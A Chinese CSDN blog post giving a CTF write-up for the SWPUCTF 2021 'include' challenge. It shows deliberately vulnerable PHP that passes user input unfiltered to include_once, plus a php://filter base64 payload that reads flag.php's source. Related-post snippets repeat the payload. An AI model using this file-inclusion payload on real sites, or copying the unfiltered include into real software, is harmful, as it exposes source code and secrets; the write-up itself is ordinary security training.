NSSCTF刷题笔记web3——[SWPUCTF 2021 新生赛]include

已于 2024-01-19 13:48:42 修改
阅读量542 收藏 5
点赞数 9
分类专栏: web 文章标签: java android 前端
于 2024-01-18 21:52:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45692883/article/details/135685038
版权 
<?php
ini_set("allow_url_include","on");
header("Content-type: text/html; charset=utf-8");
error_reporting(0);
$file=$_GET['file'];
if(isset($file)){
    show_source(__FILE__);
    echo 'flag 在flag.php中';
}else{
    echo "传入一个file试试";
}
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
include_once($file);
?>

代码如上,没有做任何的过滤。

考点是,绕过php文件被包裹会当做后端语言执行,需要通过伪协议base64加密的方式提取出来

payload为

?file=php://filter/convert.base64-encode/resource=flag.php

qq_45692883
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
我的ctf刷题wp笔记
03-25
SWPUCTF 2021 新生 —— whitegive_pwnV1 本题目聚焦于一个典型的CTF比中的二进制漏洞利用挑战,名为“whitegive_pwnV1”。通过对题目描述的解读,我们可以深入分析其中涉及的重要概念和技术细节。 ##### 一...
谷歌师兄的leetcode刷题笔记--:——
06-30
谷歌师兄的leetcode刷题笔记Android 滑动布局 这是 的兄弟。 一年前,我开始制作一个以我的好朋友命名的应用程序。 设计师给了我一张设计图,设计是这样的: 我发现实现这种效果非常困难,因为您必须非常熟悉 ...
[SWPUCTF 2021 新生]include
2302_80059204的博客
11-19 74
根据提示传入一个file试试,即?flie=1可以得到一个页面。[SWPUCTF 2021 新生]include。进行审计之后可以明白是进行php为协议的上传。得到base64密文解密即可。
labuladong的算法秘籍+刷题笔记V2.0
09-17
《labuladong的算法秘籍+刷题笔记V2.0》是针对计算机程序员面试和技能提升的一份宝贵资源,特别关注于刷题、算法和数据结构的学习。这套资料包含两部分:《labuladong的刷题笔记V2.0(力扣版).pdf》和《labuladong的...
刷题笔记——java学习
05-12
刷题笔记——java学习
LeetCode刷题笔记——63. 不同路径 II
12-21
【LeetCode刷题笔记——63. 不同路径 II】 一、题目描述: 在LeetCode的第63题中,我们被要求计算一个有障碍物的网格中从左上角到右下角的不同路径数量。网格由一个二维整数数组`obstacleGrid`表示,其中1代表障碍...
## [SWPUCTF 2021 新生]include
Sony_future的博客
04-18 343
convert.base64-encode意思是编码以base64形式进行加密。将下面这个base64代码复制,找个base64解码软件进行解码。2.传入file后提示flag在flag.php中。#后面是包含的文件(此题为flag.php)3.下面就会出现一个以base64编码的代码。#read 读取(也可以改成write写入。1.首先题目要求传入一个file。4.base64解码。
文件包含 [SWPUCTF 2021 新生]include
m0_75178803的博客
12-20 1018
简介:是否允许将URL(HTTP,HTTPS等)作为文件打开处理。allow_url_fopen 它决定了 PHP 是否能够通过 URL (而非本地文件路径) 来打开文件 ,当 allow_url_fopen 是 On时,函数可 读取 或 写入 远程文件,如 fopen() 和 file_get_contents()。而为 Off 时,这些函数 只能用于操作本地文件。
php伪协议 [SWPUCTF 2021 新生]include
qq_62046696的博客
05-15 2540
最近sqlmap的题真的太烧脑了,看一下这道题 打开界面,让我传入一个file直接操作 看见allow_url_include 状态为on,想到了php伪协议,用filter读取flag.php里面的信息构造 url ?file=php://filter/read=convert.base64-encode/resource=flag.php 发现一串编码, 猜测是base64加密以后的编码,然后进行解码 欧克任务结束!!! 接下来同样是一道php伪协议的题,[SWPUCTF 2021
NSSCTF练习记录:[SWPUCTF 2021 新生]include
最新发布
qq_44396970的博客
08-05 128
php:// 访问各个输入/输出流,常用php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。因为存在include_once函数,可以使用php伪协议获取flag.php源码,再通过base64解码得到flag。随便传入一个file。
NSSCTF | [SWPUCTF 2021 新生]jicao
2302_80946742的博客
05-08 666
整个脚本的逻辑是:首先展示index.php的源代码,然后检查从用户提交的数据中是否包含特定的id值和JSON字符串。如果这些用户输入的数据符合特定条件,则返回一个所谓的“flag”。POST方式提交的id参数值为“wllmNB”。GET方式提交的json参数可以解码为一个包含的数组。则会执行echo $flag;语句,服务器会返回$flag变量中存储的信息。GET请求方式可以直接构造payload,POST请求方式可以使用HackBar这个浏览器插件。payload:?id=wllmNB。
SWPUCTF 2021 新生
weixin_44770698的博客
12-21 3461
SWPUCTF 2021 新生(日常练习)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值